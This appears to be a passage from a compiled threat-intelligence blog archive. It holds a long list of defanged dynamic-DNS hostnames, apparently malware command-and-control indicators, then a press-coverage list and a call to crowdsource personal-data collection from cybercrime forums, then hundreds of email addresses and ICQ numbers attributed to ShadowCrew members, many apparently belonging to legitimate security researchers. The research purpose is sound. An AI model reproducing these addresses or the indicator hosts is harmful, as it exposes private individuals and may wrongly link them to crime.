hxxp://injectman.ddns.net/

hxxp://insegnando.net/

hxxp://inteljet.ddns.net/

1007

hxxp://intelresol.ddns.net/

hxxp://ipv445.hopto.org/

hxxp://iqram85spy.ddns.net/

hxxp://iran0513.ddns.net/

hxxp://ircvenezia.it/

hxxp://isamdonita.no-ip.org/

hxxp://islam2020libya.no-ip.biz/

hxxp://izmirsatranckursu.net/

hxxp://jackdroid.systes.net/

hxxp://jackdroid1337.ddns.net/

hxxp://jafarman.ddns.net/

hxxp://jalal123.hopto.org/

hxxp://jas7ser.hopto.org/

hxxp://jassair.hopto.org/

hxxp://jbrianwashman.com/

hxxp://jirawat01.ddns.net/

hxxp://jkgytgasjg12.serveftp.com/

hxxp://jnkey.ddns.net/

hxxp://jockerhackerxnxx.ddns.net/

hxxp://johnharim004.ddns.net/

hxxp://jojomo.ddns.net/

hxxp://jomo.zapto.org/

hxxp://josewaldo.ddns.net/

hxxp://juanblackhak.ddns.net/

hxxp://juliocoelhodesa.hopto.org/

hxxp://jun.dynu.com/

hxxp://justarat.noip.me/

hxxp://k0k0wawa.hopto.org/

hxxp://kaedalsh.ddns.net/

hxxp://kaizen00.ddns.net/

hxxp://kakashi.ddns.net/

hxxp://kaliheh.no-ip.biz/

hxxp://kalinus.ddns.net/

hxxp://kalljo.dvrdns.org/

hxxp://kararkarar0780.ddns.net/

hxxp://karenchik19.hopto.org/

hxxp://karrarhuseein82.ddns.net/

hxxp://kaskw.myftp.biz/

hxxp://kaskw.zapto.org/

hxxp://kasofe123123aa.no-ip.biz/

hxxp://kasper.ddns.net/

hxxp://keskes02122002.ddns.net/

hxxp://kevte26.zapto.org/

hxxp://khaleel0.zapto.org/

hxxp://khalid-2016.noip.me/

hxxp://khantac.ddns.net/

hxxp://kheridla.hopto.org/

hxxp://kingdom.no-ip.biz/

hxxp://kinggg.ddns.net/

hxxp://kjgjgkhffh.sytes.net/

1008

hxxp://kka163.ddns.net/

hxxp://kkarox90.no-ip.org/

hxxp://kmessi.myddns.me/

hxxp://korelev.no-ip.org/

hxxp://krem111.ddns.net/

hxxp://krlol.ddns.net/

hxxp://ksbozo.ddns.net/

hxxp://kskdt.ddns.net/

hxxp://kuraist.zapto.org/

hxxp://kusleratnt.duckdns.org/

hxxp://lahyarhmo.hopto.org/

hxxp://lamorash.ddns.net/

hxxp://laze22.hopto.org/

hxxp://learnxea.duckdns.org/

hxxp://led5526.ddns.net/

hxxp://likerrdd.myftp.biz/

hxxp://linonymousami.no-ip.org/

hxxp://lizdlezozifpo.ddns.net/

hxxp://local1232.ddns.net/

hxxp://locolocoloco.ddns.net/

hxxp://lolman.ddns.net/

hxxp://lordxxx.myq-see.com/

hxxp://love2014.ddns.net/

hxxp://loveubaby.3utilities.com/

hxxp://lputyr.myq-see.com/

hxxp://luxuriaecu.ddns.net/

hxxp://madblack0.sytes.net/

hxxp://madov-matrix25.no-ip.org/

hxxp://magemankoktelam.ddns.net/

hxxp://mahdi1379.ddns.net/

hxxp://mahdi3141.ddns.net/

hxxp://mahdibaba123.ddns.net/

hxxp://majed111111.myq-see.com/

hxxp://majod98m.ddns.net/

hxxp://makarand.no-ip.org/

hxxp://malakatef09.ddns.net/

hxxp://mamal9921.ddns.net/

hxxp://mami5255.duckdns.org/

hxxp://mar020one.hopto.org/

hxxp://marcsil.ddns.net/

hxxp://marknetz.hopto.org/

hxxp://marocmaroc.hopto.org/

hxxp://martin123456.no-ip.org/

hxxp://masafat.ddns.net/

hxxp://maskaralama.ddns.net/

hxxp://masterat.myftp.org/

hxxp://matgio.duckdns.org/

hxxp://matrix-teste.ddns.net/

hxxp://mayyaha.no-ip.info/

hxxp://mazenttr2.hopto.org/
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hxxp://me512.zapto.org/

hxxp://medoahmed3.ddns.net/

hxxp://medx321.ddns.net/

hxxp://mee2008.zapto.org/

hxxp://mehost.ddns.net/

hxxp://mehtab123.ddns.net/

hxxp://memeaimen10.hopto.org/

hxxp://memexmama.ddns.net/

hxxp://mhoammedtty.hopto.org/

hxxp://mht3.ddns.net/

hxxp://microsoft-office.ddns.net/

hxxp://mido28.hopto.org/

hxxp://migo2018.zapto.org/

hxxp://mikaniki.ddns.net/

hxxp://mikestar.no-ip.biz/

hxxp://miltin2.no-ip.org/

hxxp://minou555.hopto.org/

hxxp://misterx94.ddns.net/

hxxp://misty255.no-ip.org/

hxxp://mixtape2016.ddns.net/

hxxp://mmdjj212.myftp.biz/
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Historical OSINT - Dancho Danchev’s Media and News Coverage - 2008-2013 (2019-09-20 17:25)

Dear blog readers I wanted to take the time and effort and summarize all the currently related news media articles

referencing me and my research throughout the period - 2008-2013 and wanted to express my gratitude to everyone

who approached me seeking my assistance in an upcoming news article including those who participated in the

search for me circa 2010 and I wanted to let everyone know that users interested in approaching me regarding

potential news stories including conference presentations and possible threat intell requests can approach me at

disruptive.individuals@gmail.com

Stay tuned!

Research and News Articles covering my research and referencing me throughout - 2008:

• [1]Russian hacker ’militia’ mobilizes to attack Georgia

• [2]Fraudsters Target Facebook With Phishing Scam

• [3]Fake Microsoft e-mail contains Trojan virus

• [4]Hackers expand massive IFRAME attack to prime sites

• [5]Hackers infiltrate Google searches

• [6]Hackers expand massive IFrame attack to prime sites
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• [7]Hackers knocked Comcast.net offline

• [8]Adobe investigates Flash Player attacks

• [9]High-tech bank robbers phone it in

• [10]Attackers booby-trap searches at top Web sites

• [11]Carpet bombing networks in cyberspace

• [12]Storm worm e-mail says U.S. attacked Iran

• [13]India’s underground CAPTCHA-breaking economy

• [14]Domain Name Record Altered to Hack Comcast.net

• [15]Google searchers could end up with a new type of bug

• [16]Ongoing IFrame attack proving difficult to kill

• [17]Hackers expand massive IFRAME attack to prime sites

• [18]Danchev: The small pack Web malware exploitation kit

• [19]Danchev: Massive SQL injection the Chinese way

• [20]CAPTCHAs are dead - new research from Dancho Danchev confirms it

• [21]Hackers infiltrate Google searches

• [22]Massive faux-CNN spam blitz uses legit sites to deliver fake Flash

• [23]Faked CNN spam blitz pushes fake Flash

• [24]Danchev: Anti-fraud site DDOS attack

• [25]Sony PlayStation site victim of SQL-injection attack

• [26]Fake CNN Alert Still Spreading Malware

• [27]Look Ma, I’m on CIA.gov

Research and News Articles covering my research and referencing me throughout - 2009:

• [28]Green Dam exploit in the wild

• [29]“In gaz we trust”: a fake Russian energy company facilitating cybercrime

• [30]Don’t pay your ransom via SMS

• [31]NYT scareware scam linked to click fraud botnet

• [32]Danchev: A crimeware developer’s to-do list

• [33]Danchev rained on my scareware campaign

• [34]Is “aggregate-and-forget” the future of cyber-extortion?
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• [35]NYT scareware scam linked to click fraud botnet

• [36]Microsoft declares war on ’scareware’

• [37]Don’t pay your ransom via SMS

• [38]Twitter warms up malware filter

• [39]What’s really the safest Web Browser?

• [40]With Unrest in Iran, Cyber-attacks Begin

• [41]Zeus bot found using Amazon’s EC2 as C &C server

Research and News Articles covering my research and referencing me throughout - 2010:

• [42]Firefox add-on encrypts sessions with Facebook, Twitter

• [43]Watch out for malware with those pretty Mac screensavers

• [44]Months-old Skype vulnerability exploited in the wild

• [45]Danchev: Money mule recruiters

• [46]Cybercrime’s bulletproof hosting exposed

• [47]Malware Threatens to Sue BitTorrent Downloaders

• [48]Firefox add-on encrypts sessions with Facebook, Twitter

• [49]Chuck Norris Botnet Karate-chops Routers Hard

Research and News Articles covering my research and referencing me throughout - 2011:

• [50]Kaspersky disputes McAfee’s Shady Rat report

• [51]Has EV-SSL Growth Been Slow?

• [52]Report: Vishing Attack Targets Skype Users

Research and News Articles covering my research and referencing me throughout - 2012:

• [53]Fake UPS notices deliver malware

• [54]ZeuS/Zbot Trojan Spread Through Rogue US Airways Email

• [55]New Skype malware threat reported: Poison Ivy

• [56]Five Koobface botnet suspects named by New York Times

• [57]Virtual jihad: How real is the threat?

• [58]Is the death knell sounding for traditional antivirus?

• [59]Can the Nuclear exploit kit dethrone Blackhole?
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• [60]Experts split over regulation for bounty-hunting bug sniffers

• [61]Spammers Using Fake YouTube Notifications to Peddle Drugs

• [62]Adele Bests Adderall As Affiliate Spammers Offer Music Downloads

• [63]Bulgarian sleuth unveils botnet operators

• [64]Fake PayPal Emails Distributing Malware

• [65]Web Gang Operating in the Open

• [66]ZeuS/Zbot Trojan Spread Through Rogue US Airways Email

• [67]Buy 500 hacked Twitter accounts for less than a pint

• [68]NBC.com Hacked, Infected With Citadel Trojan

Research and News Articles covering my research and referencing me throughout - 2013:

• [69]How Much Does A Botnet Cost?

• [70]Automated YouTube account generator offered to cyber crooks

• [71]Upgraded Modular Malware Platform Released in Black Market

• [72]Deconstructing the Al-Qassam Cyber Fighters Assault on US Banks

• [73]NBC hack infects visitors in ’drive by’ cyberattack

• [74]Bitcoins are being traded for hack tools

• [75]New DIY Google Dorks Based Hacking Tool Released

• [76]Hacking The TDoS Attack

• [77]Mass website hacking tool alerts to dangers of Google dorks

• [78]Cybercrime service automates creation of fake scanned IDs

• [79]Spammers unleash DIY phone number slurping web tool

• [80]Spam email contains malware, not Apple gift card

• [81]APT1, that scary cyber-Cold War gang: Not even China’s best

• [82]Mass website hacking tool alerts to dangers of Google dorks

• [83]C &C PHP script for staging DDoS attacks sold on underground forums

• [84]Russian Malware-as-a-Service Offers Up Server Rentals for $240 a Pop

• [85]Java exploit kit sells for $40 per day

• [86]Buggy DIY botnet tool leaks in black market

• [87]New DIY Google Dorks Based Hacking Tool Released

• [88]Botnets for rent, criminal services sold in the underground market
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• [89]Spam email contains malware, not Apple gift card
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Announcing Law Enforcement and OSINT Intelligence Operation "Uncle George" - Join Me Today!

(2019-10-16 20:16)

Dear blog readers,

Surprise, surprise! I wanted to let everyone know that I’ve spend a decent portion of my time crawling and

actually harvesting and data mining 78 high-profile public Cybercrime Forum Communities basically consisting of

1M raw OSINT data Web site pages harvested and ready for processing and enrichment. Dare to join the campaign?

Keep reading and drop me a line at ddanchev@cryptogroup.net to coordinate and discuss including details on how

to obtain free access to the 2019 Cybercrime Forum Community Data Set which is basically 18GB comprising of 1M

crawled and harvested Web sites from the most popular Public Cybercrime Forum Communities.

Timeline of the Project including What You Need to Participate with the Ultimate Goal to Track Down the

Individuals Behind These Communities and Actually Take Them Down:

• Drop me a line at ddanchev@cryptogroup.net and let me know that you’ve downloaded it and that you’re

currently interested in participating in the project

• Please coordinate with me what you plan to do with the archive in terms of possible raw OSINT enrichment

and automated Social Network Analysis including sharing it with your Law Enforcement contacts or colleagues

in your organization at dancho.danchev@hush.com

• Grab a copy of Open Desktop Semantic Search - https://www.opensemanticsearch.org and process the archive

• Grab a copy of Solr-Powered Local Yacy Search Engine - https://yacy.net and process the archive
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• Grab a copy of Carrot2 – Open Source Search Results Clustering Engine - https://project.carrot2.org/ and connect it with Solr-Powered Local Yacy Search Engine and start processing the results and share the results with

me at dancho.danchev@hush.com

• Grab a copy of the following Statistical graphs generating tool - https://github.com/ko-ichi-h/khcoder and begin

working on the archive

The Objectives List:

• Gather as much evidence for participation in fraudulent activity and shut down the community

• Collect as much personal information as possible including IoCs (Indicators of Compromises) Web site URLs

including personal IM accounts and personal email addresses

• Publicly publish the results of the crowd-sourced raw OSINT enrichment project campaign and ask everyone to

reach out to their contacts in U.S Intelligence Community and international Law Enforcement to share the data

and actively participate in the actual prosecution of the individuals behind these Cybercrime Forum Communi-

ties and the actual take-down process

• Share the data-set with as many academic Security Industry U.S Intelligence and international Law Enforcement

contacts as possible

Drop me a line at ddanchev@cryptogroup.net and let’s get the campaign going!

The results? Check out the following enriched raw OSINT graph which I managed to create for research pur-

poses and to motivate you to participate.
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Related Graphs Produced To Motivate You to Participate on a Per Keyword Basis:
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Sample Screenshot of the ShadowCrew Cybercrime Forum Community circa 2002-2004:

1047



Sample Public Member Email addresses of ShadowCrew Cybercrime Forum Community circa 2002-2004:

shadow@shadowcrew.com

idline@ziplip.com

vengeance _1@ziplip.com

cracker81@ziplip.com

den5013@ziplip.com

onthefringe@ziplip.com

midhack@ziplip.com

toastypimp@yahoo.com

fakeid@ziplip.com

anonraider@hotmail.com

KsnowyInc@ziplip.com

spookycat911@ziplip.com

Necromancer01@ziplip.com

script4dumps@ukr.net

dominican@ziplip.com

rcwizard@ziplip.com

CAYMAN@Vegas.zzn.com

kahuna@mailvault.com

nhlaxus@ziplip.com

jamal@ziplip.com

cam@mailvault.com

stocksstocks@ziplip.com

Dimmesdale@ziplip.com

MiCR0 _tECh@ziplip.com
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vertiloto@blueyonder.co.uk

ultrateck146@aol.com

ilithiumi@ziplip.com

flashfire@ziplip.com

p4lman@s-mail.com

vikkingchick@aol.com

emo _faulds@hotmail.com

drumnhoouse@netscape.net

scottlenord@yahoo.com

rkj22@ziplip.com

tec9@mailvault.com

subuk01@hotmail.com

malpadre _@hotmail.com

kkmac2003@aol.com

phoenixoz@hotmail.com

natural _ice _59@hotmail.com

chrisp92656@yahoo.com

agent@inbox.nu

shadiestfiveten@hotmail.com

matrix _447@yahoo.com

hockeymark99@hotmail.com

circatropolis@email.com

circatrooper@hotmail.com

damned@damned.ro

Ranger@mailvault.com

poop@sex.com

crazy _gm@hotmail.com

pimpin _ken _op@hotmail.com

slickrick@ziplip.com

nons@usa.com

wulfnacht@msn.com

poofibgone@mailvault.com

firewireID@ziplip.com

BlkOps@mailvault.com

bikerbill@ziplip.com

jwelsh@welshworks.com

RichardKimble@mailvault.com

y0rks@ziplip.com

xdirc@mailvault.com

jilsi@ziplip.com

ji8si@hotmail.com

JCDyer82@hotmail.com

kill4kr@spray.se

myleena@mailvault.com

ccsupplier@ziplip.com

bad _karma@ziplip.com

cyptdog@homtail.com

cyptdog@yahoo.com

MrUntouchableSC@hotmail.com

trance _boy3000@hotmail.com
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MrBill@emaildownunder.com

iceman12@mailvault.com

thegeko2002@yahoo.fr

mcmf _violent _j@hotmail.com

djdonte@schoolsucks.com

confidential@mutemail.com

hiroshi _saito85@hotmail.com

jorge28@hotmail.com

jorgescalanter@yahoo.com

mcscammer@ziplip.com

esse@ziplip.com

plasticbuyer@hotmail.com

mad _carder@ziplip.com

madcarder@aol.com

dtraxor@hotmail.com

clarolherbal@hotmail.com

eddie _123@hotmail.com

sales@perfectids.com

digitaldemon@ziplip.com

Pmal@ziplip.com

sibba@ziplip.com

slackerx@mailvault.com

Chairmanoftheboard@ziplip.com

BigTymeBallin@ziplip.com

sharlton@hotmail.com

willhemsley@hotmail.com

rcw1zard@hotmail.com

justlearning@hushmail.com

sexyred15@hotmail.com

Mental _Hopscotch@hushmail.com

e-talos@mailvault.com

derezz404@hotmail.com

nosoup4you@subdimension.com

troymclure@ziplip.com

ketamin _dream@hotmail.com

telaviv2976us@yahoo.com

verbal0g@yahoo.com

verbal0g@msn.com

saumurk@hotmail.com

princeofpassionca@yahoo.ca

gordie@ziplip.com

djchepper@hotmail.com

rudemuthafucka@imabadlittleboy.com

unrealsecurity@mailvault.com

glock911@mailvault.com

geekusdeekus@hotmail.com

tranceplastic@ziplip.com

ozymandias@ziplip.com

dutex@ziplip.com

kamikavi@hotmail.com
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GLOBEMAN@ziplip.com

bluetree1955@hotmail.com

bluetree1955@yahoo.com

MiCR0 _tECh@yahoo.com

frotchman@hotmail.com

Raptor@mailvault.com

homeboy@protectmymail.com

jonny _boy89@hotmail.com

masquerade71id@hotmail.com

masquerade71id@yahoo.com

space-dog@ntlworld.com

NeilPeart@ziplip.com

deraw280@mailvault.com

chingiz@gmx.net

axecharlton@breathe.com

no1betta@ziplip.com

petegr@ziplip.com

Chemical _Kidd@hotmail.com

trustfunded@hotmail.com

boomsicka@ziplip.com

c12173@hotmail.com

Top _Holos@yahoo.com

phraud@ziplip.com

counter _fit@ziplip.com

PygmyShrew@ziplip.com

gettowitch@ziplip.com

khamkham@ziplip.com

rogue _enc@hushmail.com

ink@themusclezine.com

IPg0sht@hotmail.com

Thakid22@yahoo.com

snowboardkid56@aol.com

milkee2936@ziplip.com

keith1569@mailvault.com

gucciman _2003@yahoo.com

gucciman _2003@hotmail.com

LrdPath@aol.com

jesevski@hotmail.com

alex _phukoff@hotmail.com

aftermath1024@msn.com

blaze1669@yahoo.com

mister _shaggy@hotmail.com

tandrek@mailvault.com

lawhack@ziplip.com

bluebamboo49@yahoo.com

whynot _@ziplip.com

orders@terroristsupply.com

scrub22003@yahoo.com.br

minus9@mailvault.com

thecreame@hotmail.com
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jhosking77@yahoo.com.au

usaru2001@yahoo.com

blackice8636@ziplip.com

omarhayyam2002@yahoo.com

namon@mailvault.com

DM6311@ziplip.com

board _dokter2000@hotmail.com

shaubarak@ziplip.com

MR.HR@ziplip.com

theamericanpsycho@ziplip.com

ehlerssc@msu.edu

meerakker@s-mail.com

blackrob911@hotmail.com

blackrob91@aol.com

humpmike420@hotmail.com

romainschwertz@pingnet.ch

nightkrawler@ziplip.com

drudown@ziplip.com

veg@ziplip.com

degreeuniversity@ziplip.com

spun1inspunville@yahoo.com

chewis393@hotmail.com

chewis393@yahoo.com.mx

dstephania@attbi.com

locolive@ziplip.com

og6@ziplip.com

yeez@hotmail.com

EvenOner@hotmail.com

tonsoffun@ziplip.com

grupopax@yahoo.com

medellru@yahoo.com

atownave@hotmail.com

brynster1@ziplip.com

freddiez@hotmail.com

mathieu690@gosympatico.ca

sales@cooldegree.com

Slaurworks@earthdome.com

majjack@majjack.com

dan _lopez99@hotmail.com

SCjamalSC@yahoo.com

koolhandluke@ziplip.com

donnyisnaked@msn.com

blackarmor@ziplip.com

joe _quarterback@hotmail.com

al _cappone22@hotmail.com

i _luv _u _ro@yahoo.com

No _Exit@hotmail.com

back2daprimitive@hotmail.com

freshintake@msn.com

diva1@ziplip.com
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Feces@Poop.org

visualise303@hotmail.com

benstone@mailvault.com

darktide@telusplanet.net

tonystarx@ziplip.com

ctroy@ziplip.com

FraMd323@mailvault.com

a _nightmare@mailvault.com

spitphire@mail.ru

jwillpromo@yahoo.com

doggfortyfive@hotmail.com

marthamoxley@mail.ru

skulebas101@hotmail.com

neuby34@hotmail.com

bigpickster@aol.com

caligirl02@ziplip.com

O0nytejade0O@aol.com

wolfram@ziplip.com

bigbuyer@counterfeitcards.com

hoots1967@hotmail.com

Ace@Hole.com

thessor@ziplip.com

adamtoth@hotmail.com

dieselino@usa.com

wakes@ziplip.com

crazyd9483@hotmail.com

triple-sinner@ziplip.com

midnyte@stormfeather.com

tron@counterfeitcards.com

jb604@hotmail.com

Ali3nS3xFi3nd@msn.com

emperordalek@zombieworld.com

Southerner@Republican.com

johnkimble@mailvault.com

dr.p@ziplip.com

deen _suleman@yahoo.com

mycounter@ziplip.com

tellatubbiesrko@aol.com

los.angeless@fbl.gov

freeman82@ziplip.com

ukbadboy@ziplip.com

flossboi@yahoo.com

modestlygreat@hotmail.com

modestlygreat@yahoo.com

abaddon@802.11ninja.net

frostedflake@yahoo.com

badnewstodd@ziplip.com

cromm@quicksilver.net.nz

badboyballads2000@yahoo.com

xstreetsk8er487x@yahoo.com
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ccking@electricpenis.com

gtelia@hotmail.com

gtelia00@yahoo.com

sif@ziplip.com

musha@phreaker.net

thecatreturn@hotmail.com

neiromantik@yahoo.com

Byrd@flashmail.com

ilalexil@hotmail.com

shabazz@ziplip.com

sp00f@ziplip.com

platinumplus@ziplip.com

5u5p3ct@cyber-rights.net

polikking@mailvault.com

willieo@ziplip.com

waynewayne@ziplip.com

ranxerox69@bolt.com

linkpin34@aol.com

OerO@mailvault.com

jasonbourne@ziplip.com

xminderbinderx@ziplip.com

combattantdeliberte@ziplip.com

nonzero@hush.com

CANADIAN2001@ziplip.com

shellydvained@yahoo.com

jon@fakeiduk.co.uk

PaulieStew@hotmail.com

jeremyzamyslowski711@hotmail.com

oofzpumba@yahoo.com

oofzpumba@msn.com

crackolic@hotmail.com

carding@versa-us.com

b _digital2k@hotmail.com

alyn _peden@hotmail.com

DebbieGroeneveld192@hotmail.com

kyndo@ziplip.com

midhack@mailvault.com

robertlowery _1@lycos.com

jeffsm@ziplip.com

swastikaeyes@ziplip.com

Email@shadowcrew.com

RyDen@ziplip.com

thanxlinkpin34@aol.com

slobodan2002@mail.ru

plastic@counterfeitcards.com

down@ftp.ttdown.com

Kyr0N@zor.org

ttdown@ftp3.ttdown.com

fix@jsftp.fixdown.net

perfectids@mailvault.com
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BrianD@mailvault.com

whatever@ziplip.com

login@ziplip.com

registry@forss.net

martin.andersson@utfors.se

krister.lenberg@utfors.se

buyerguide@accountant.com

intellegence@ziplip.com

script4cc@ukr.net

z-e-n@mailvault.com

irisport@ziplip.com

doink2@ziplip.com

harro@ziplip.com

plunger@mailvault.com

CardGuy _1983@ziplip.com

tazorak@yifan.net

nouvou@ziplip.com

mrsyndicate@mailvault.com

wileecoyote@ziplip.com

yes@ilovelily.net

qwert@ua.fm

jdp@usermail.com

bulkbuyer@usa.com

osharifff@yahoo.fr

fonefag@ziplip.com

asheroner@ziplip.com

eagle@eagle.org

BadnewsBrown667@aol.com

thanksalotman@hotmail.com

thalus _private@mailvault.com

skaplan110@attbi.com

shadowcrew@ziplip.com

domain@zentek-international.com

ni69az@yahoo.com

thelistguy@ziplip.com

ICE _Storm@ziplip.com

macgyver@mailvault.com

61476@xxxx.edu

rocketchimpalpha@hotmail.com

wolfram@consultant.com

daidarek@hotmail.com

admin@mypage.4all.cc

leek@europe.com

morzhov@bk.ru

Blah@aol.com

stayfly2udie@hotmail.com

info@e-fidex.com

krankmeup@mailvault.com

blankcheck@hushmail.com

s3ba@ziplip.com

1055

ifyourinthebattle@ziplip.com

kathy@fakeidman.org

art@martinridley.com

khameleon@ziplip.com

stallionmover@scurtek.com

Excise@ziplip.com

bones _49 _5@hotmail.com

leek@mail.com

saint7@Cyber-rights.net

kagney@ziplip.com

XBand2040@mailvault.com

TheBestofBC@ziplip.com

caponeseller@mail.com

smartcarder@yahoo.com

knowledgeableone@hotmail.com

knowledgeableone@quixer.com

knowledgeable1@quixer.com

poppy.crops@ziplip.com

cc4me@hotmail.com

deriva@ziplip.com

scarface05@ziplip.com

blackdog53@ziplip.com

24609@ziplip.com

midhack@verizon.net

Deck@ziplip.com

vitali@webmoney.ee

silentmaori@hotmail.com

thetussin@ziplip.com

refy@ziplip.com

Troublesome714@ziplip.com

la-al@justice.gc.ca

blueman77@ziplip.com

knobs@oceanfree.net

jburton@ziplip.com

whatever@ebay.com

miragegq@yahoo.com

exids@ziplip.com

defx@ziplip.com

URsTrULyInNYC@aol.com

shiva@computekservices.com

Paulsmithinny@yahoo.com

cjlax5@ziplip.com

user@pm-shadowcrew.com

meerakker@pm-shadowcrew.com

kickman@ziplip.com

thesoupnazi@ziplip.com

importuner@ziplip.com

v1pee@e-mail.ru

patryn@ziplip.com

aladdin275@yahoo.com
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capaefex@ziplip.com

walterwolf@ziplip.com

SLiPz@ziplip.com

iisps@ziplip.com

alexei _d@mail.ru

sharon@captix.com

magog@ziplip.com

jayare@ziplip.com

webappsec@securityfocus.com

novidus@ziplip.com

ttboafact@canada.com

Ziffnavi@fitec.co.jp

perfectionist2003@ziplip.com

bigbuyer@gmx.net

mrnoface@ziplip.com

info@photoidcards.com

kidd@ziplip.com

ben@getwasted.net

CT _man@ziplip.com

idcrisis@ziplip.com

soccccerguy@hotmail.com

shadowdonations@ziplip.com

you@shadowcrew.com

mobties@ziplip.com

calitaliban@ziplip.com

admin.buu@loxinfo.ac.th

route@infonexus.com

momomania@hotmail.com

Namechange@ziplip.com

salve2001@ziplip.com

Gateway2000@ziplip.com

Slayer@Kraix.com

great.cc4me@hotmail.com

cc@scriptsjob.com

shadowmembership@ziplip.com

Sigma@DNS-CORE.com

admin@shadowcrew.com

tom333@ziplip.com

sadf@1Cust31.tnt1.minneapolis.mn.da.uu.net

mrmojorising@ziplip.com

securitymind@tut.by

teslinsupply@yahoo.com

restoration656@hotmail.com

hara@ypn.co.uk

IQ163@ziplip.com

lex@mindvox.phantom.com

lex@stormking.com

jzamyslowski711@hotmail.com

Thedude@aol.com

cl@counterfeitlibrary.com

1057

kestra@ziplip.com

capone420@ziplip.com

hpouches@yahoo.com

gollumfun@ziplip.com

degreeuniversity@hotmail.com

akingston@ziplip.com

customitnow@ziplip.com

Eloheem@ziplip.com

blacks@mail.com

joe@innerhost.com

canuck@ziplip.com

canuck@amadeupemailaddressidonthaveaccessto.com

spit-fire@ziplip.com

sales@closedcollege.com

billing@Phantominfo.com

cham@ua.fm

Fontaine420@ziplip.com

Creep01@ziplip.com

dammit@ziplip.com

gollumfun@hushmail.com

domains@aol.net

abuse@aol.net

noc@aol.net

kaliberx@ziplip.com

info@professionaldegrees.com

info@penningtonu.com

kingofthefoothill@hotmail.com

pridget@dbzmail.com

interception@mail.com

080120@ziplip.com

werewolf@gmx.net

fgmp123@ziplip.com

Cyphon@ziplip.com

cplanet@ziplip.com

legal@shadowcrew.com

stuffx@ziplip.com

nobody@sigma.dns-core.com

E17sb1x-0000F6-00@sigma.dns-core.com

team@verizon.net

dogwood70@ziplip.com

team@adultfriendfinder.com

username@NOSPAM.domain.com

tdog@myself.com

ralph@doncaster.on.ca

realplastic@gmx.net

you@hush.com

you@elitefitness.com

DR.Smith@belizeweb.com

lighthawk4@ziplip.com

ampersona@ziplip.com
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lancelotlink@ziplip.com

mhall@netcom.com

pvthc@ziplip.com

chbigben@ziplip.com

drift@ziplip.com

mac _addict1984@yahoo.com

littletommy@ziplip.com

FireWire@ziplip.com

firewire7@hotmail.com

renegadeUK@ziplip.com

zidaneiv@hotmail.com

wldnczy@ziplip.com

fakeIDusa@ziplip.com

the1andonly@ziplip.com

GiB _Uk@ziplip.com

jon101@ziplip.com

helpwanted@ziplip.com

email.III _barcode _III@ziplip.com

Tz2@ziplip.com

madrid@ziplip.com

Artyanon@mailvault.com

utax@inbox.lv

saradonne@ziplip.com

perfectids@yahoo.com

blackarmor@eurosport.com

kkimmel@terroristsupply.com

idline@mailvault.com

dr@dursec.com

rongula31@hotmail.com

ken.williams@ey.com

roesch@sourcefire.com

fygrave@scorpions.net

vision@whitehats.com

rfp@wiretrip.net

aleph1@securityfocus.com

wooc@powersurfr.com

apr.inc@powersurfr.com

conroy.badger@powersurfr.com

crystal@positioning-research.com

jason.dorie@blackboxgames.com

darryl _turner@yahoo.com

mrandles@softhome.net

vizuelle@eudoramail.com

fyodor@insecure.org

spikeman@spikeman.net

lance@spitzner.net

listuser@seifried.org

mfranz@cisco.com

phillip.ibis@blackboxgames.com

cwallace@exceedia.com
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priest@sfu.ca

hdm@digitaloffense.net

rhamel@kpmg.ca

nico@securite.org

kaneda@securite.org

dsward9s@pacbell.net

andy@dragonfly.demon.co.uk

ktwo@ktwo.ca

kinkster1@shaw.ca

ajarman@metacomcorp.com

zindelak@telusplanet.net

jeff@wwti.com

smkoen@hotmail.com

cwilson2@kpmg.ca

newspixie@hotmail.com

mock@obscurity.org

j@lords.com

ksoze@obscurity.org

frank@atstake.com

fishy@powersurfr.com

cakeislove@hotmail.com

tiffany _kary@zd.com

stephenn@powersurfr.com

webmaster@pneumafables.com

bsapiro@kpmg.ca

kmx@egatobas.org

hectorh@pobox.com

emmanuel@relaygroup.com

vanja@vanja.com

dje@bht.com

dugsong@monkey.org

lyndon@orthanc.ab.ca

mts@off.off.to

paudley@blackcat.ca

robert _david _graham@yahoo.com

spambait-kyx@inetgrity.com

chris@obscurity.org

peter _wong@pmc-sierra.com

janet@lomas.ab.ca

dfreelove@yottayotta.com

dowen@intravelnet.com

randlest@oanet.com

jay@bastille-linux.org

phil@ccc-ltd.com

jed@pickel.net

gshipley@neohapsis.com

deraison@cvs.nessus.org

maxx@securite.org

mixter@newyorkoffice.com

deraadt@cvs.openbsd.org
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dittrich@cac.washington.edu

bgreenbaum@securityfocus.com

neil@bortnak.com

annemarie@counterpane.com

chris.kuethe@ualberta.ca

bob.beck@ualberta.ca

tan@atstake.com

natasha@snort.org

arr@watson.org

aempirei@ucla.edu

ggolomb@enterasys.com

jfrank@b-ap.com

robert@infoserf.net

kkuehl@cisco.com

donna.andert@sun.com

bmc@snort.org

jgary@clicktosecure.com

jpavlick@sourcefire.com

talisker@networkintrusion.co.uk

jwalchuc@enterasys.com

itay@imc.nl

halvar@blackhat.com

ppY@IdealRealms.com

forrest@code-lab.com

mconley@atstake.com

jennifer@granick.com

scott@microsoft.com

ah@securityfocus.com

cruci@hwa-security.net

solar@openwall.com

ivan.arce@corest.com

rlogan@camisade.com

cmg@uab.edu

jed@grep.net

v0nelm0@best.com

snorthcutt@hawaiian.net

frank@ccc.de

dmckay@microsoft.com

jwilkins@bitland.net

kf@gnosys.biz

unlearn@ne.mediaone.net

jpr5@darkridge.com

shok@dataforce.net

thegnome@nmrc.org

ofir@sys-security.com

provos@umich.edu

silvio@big.net.au

mike@infonexus.com

crispin@wirex.com

halfdead@phear.org
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niness@devilness.org

curtis.king@messagingdirect.com

rob@incident-response.org

kam@aversion.net

fuk@ghettobox.eurocompton.net

merharm@wra.net

zmagic@phear.org

inter@logos.relcom.ru

alive@blazinfyre.net

daemon@esmith.geezernet.nu

nwonknu@dsl-65-187-119-141.telocity.com

abramelon@cpn.cookchildrens.org

thegnome@nrmc.org

me@btinternet.com

Administrator@hotmail.com

redeemer@g0tr00t.net

b0iler@hotmail.com

who@radiofreesatan.com

poolemit@mailvault.com

fuckyoutxtax@hell.com

proxydialup@yahoo.com

info@megastep.com

sales@diplomaone.com

abuse@teledisnet.be

NOC@sprint.net

dvlpmntsftwr@hotmail.com

stepgas@hotmail.com

rra33@hotmail.com

cody@server.snni.com

kwparris@csuh.alunlink.com

wolfram@counterfeitcards.com

whoever@hotmail.com

Sample Public ICQ UIN Numbers of ShadowCrew Cybercrime Forum Community circa 2002-2004:

999008

9773639

974763

97254007

95211861

92754913

914506

89531566

8923240

86958674

802820

777726

1062

74623265

7444304

690033

6666666

637321

62527577

598629

59838986

56714884

56327073

5556665

